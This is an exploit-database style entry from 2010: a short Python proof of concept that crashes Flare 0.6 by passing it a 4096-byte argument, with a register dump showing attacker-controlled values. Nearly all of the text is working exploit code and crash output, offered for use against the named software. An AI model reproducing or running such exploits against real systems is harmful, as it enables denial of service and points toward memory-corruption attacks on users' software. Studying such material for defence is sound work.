# Exploit Title: Flare <= 0.6 local heap overflow DoS
# Date: 3/7/2010
# Author: l3D
# Software Link: http://www.nowrap.de/download/flare06doswin.zip
# Version: 0.6
# Tested on: Windows 7, Windows XP SP2 and some linux distributions
# Code:

#!/usr/bin/env python
#IRC: irc.nix.co.il<http://irc.nix.co.il>
#Site: xraysecurity.blogspot.com<http://xraysecurity.blogspot.com> <---- Coming soon!

#Registers:
#EAX 003E0000
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
#EDX 41414141
#EBX 00004141
#ESP 0022FB0C
#EBP 0022FBDC
#ESI 003E1080
#EDI 41414141
#EIP 77195B44 ntdll.77195B44

import os, sys

if len(sys.argv) != 1:
    path=sys.argv[1]
else:
    path='flare.exe'

if not os.path.exists(path):
    print 'Usage: python %s [path to flare.exe]' % sys.argv[0]
    exit(-1)

os.execl(path, path, 'A'*0x1000)

